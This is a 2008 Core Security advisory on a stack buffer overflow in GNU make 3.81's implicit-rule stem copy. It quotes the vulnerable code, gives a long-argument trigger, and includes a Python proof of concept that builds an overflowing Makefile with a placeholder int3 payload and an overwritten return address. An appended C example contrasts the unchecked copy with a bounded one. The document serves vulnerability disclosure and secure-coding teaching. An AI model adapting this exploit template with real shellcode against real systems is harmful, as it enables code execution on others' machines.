GNU-make filename buffer overflow
From: Core Security Advisories Team (CS)
Subject: GNU-make filename buffer overflow
Date: Mon, 30 Jun 2008 18:25:09 -0300
Hello,
Alfredo Ortega from Core Security Technologies has found that GNU Make
is vulnerable to a stack buffer overflow.
We would like to receive information about your plans for fixing this
bug. Technical details follow.
Affected software: GNU Make-3.81 and before.
The security impact of this bug is very low, because Makefiles already
contain the functionality to execute arbitrary code.
The bug resides in the following code at implicit.c:
199 static int
200 pattern_search (struct file *file, int archive,
201                 unsigned int depth, unsigned int recursions)
202 {
203   /* Filename we are searching for a rule for.  */
204   char *filename = archive ? strchr (file->name, '(') : file->name;
...
271   PATH_VAR (stem_str); /* @@ Need to get rid of stem, stemlen, etc. */
...
470   if (check_lastslash)
471     {
472       stem += lastslash - filename + 1;
473       stemlen -= (lastslash - filename) + 1;
474     }
475
476   DBS (DB_IMPLICIT, (_("Trying pattern rule with stem `%.*s'.\n"),
477        (int) stemlen, stem));
478
479   strncpy (stem_str, stem, stemlen);
480   stem_str[stemlen] = '\0';
Here, in line 271 the program is allocating a fixed-length variable on
the stack (using the macro PATH_VAR), but in line 479 the filename is
being copied to this buffer without any length-checking.
An easy way to trigger the bug is via command-line arguments.
For example:
$ make AAAAAA... (10000 A's)
Also, the bug can be triggered from inside Makefiles.
The following Proof of Concept triggers an Int3 on a FreeBSD-6.2-RELEASE
system. Other software may be vulnerable.
-------
#Alfredo A. Ortega - Core Security Exploit Writers Team (EWT)
#GNU Make stack overflow
#This Python script generates a Makefile that triggers the overflow
#and executes an int3 instruction (SIGTRAP)
#Tested on FreeBSD-6.2-RELEASE
#usage: python makeexploit.py >Makefile;gmake
import os
#ShellCode placeholder
overflow='\xcc'*1052
#Address
overflow+='\xbf'*4
print "all: %s" % overflow
-------
Thanks in advance,
-Carlos
--
Carlos Sarraute
Advisories Team
Core Security Technologies
www.coresecurity.com
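The defect the advisory describes is a copy whose length comes from the source string rather than from the destination buffer. The following is an added example, not code from the advisory or from GNU make: it puts a stripped-down version of that pattern (copy_stem_unchecked) beside a bounded form (copy_stem_checked) that refuses a stem which would not fit, and drives it through extract_stem, which mirrors the stem computation of pattern_search for a name with a directory part. EXAMPLE_PATH_MAX, the function names and the inputs are all constructed for illustration; the message does not say how the maintainers chose to fix the real code.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed stand-in for make's PATH_VAR: a fixed-size stack buffer.
   The size is a constructed value, not make's real PATH_MAX handling. */
#define EXAMPLE_PATH_MAX 256

/* The pattern quoted in the advisory (implicit.c lines 479-480): the
   bound is the source length, so the destination size is never consulted
   and a long stem writes past the end of dst. Shown for contrast only. */
void copy_stem_unchecked(char *dst, const char *stem, size_t stemlen)
{
    strncpy(dst, stem, stemlen);
    dst[stemlen] = '\0';
}

/* Hardened form: the copy is bounded by the destination, and a stem that
   would not fit together with its terminator is rejected instead of
   truncated silently. Returns 0 on success, -1 if rejected. */
int copy_stem_checked(char *dst, size_t dstsize, const char *stem, size_t stemlen)
{
    if (dstsize == 0 || stemlen >= dstsize)
        return -1;
    memcpy(dst, stem, stemlen);
    dst[stemlen] = '\0';
    return 0;
}

/* Mirrors pattern_search's check_lastslash branch: when the target has a
   directory part, the stem starts after the last '/'. The copy into the
   fixed buffer goes through the checked helper. */
int extract_stem(const char *filename, char *out, size_t outsize)
{
    const char *lastslash = strrchr(filename, '/');
    const char *stem = lastslash ? lastslash + 1 : filename;
    size_t stemlen = strlen(stem);
    return copy_stem_checked(out, outsize, stem, stemlen);
}

int main(void)
{
    char stem_str[EXAMPLE_PATH_MAX];

    /* Constructed input: an ordinary target name. */
    if (extract_stem("src/dir/target.o", stem_str, sizeof stem_str) == 0)
        printf("stem: %s\n", stem_str);

    /* Constructed input: a 10000-byte name, like `make AAAA...` in the advisory. */
    size_t biglen = 10000;
    char *big = malloc(biglen + 1);
    if (big == NULL)
        return 1;
    memset(big, 'A', biglen);
    big[biglen] = '\0';
    if (extract_stem(big, stem_str, sizeof stem_str) != 0)
        printf("rejected: a %zu-byte stem does not fit in %zu bytes\n",
               biglen, sizeof stem_str);
    free(big);
    return 0;
}
```

The difference that matters is which size bounds the copy: strncpy's count here is the length of the input, so it provides no protection at all, while copy_stem_checked compares against the destination before writing. Rejecting rather than truncating keeps a mismatched stem from being used as if it were the real one.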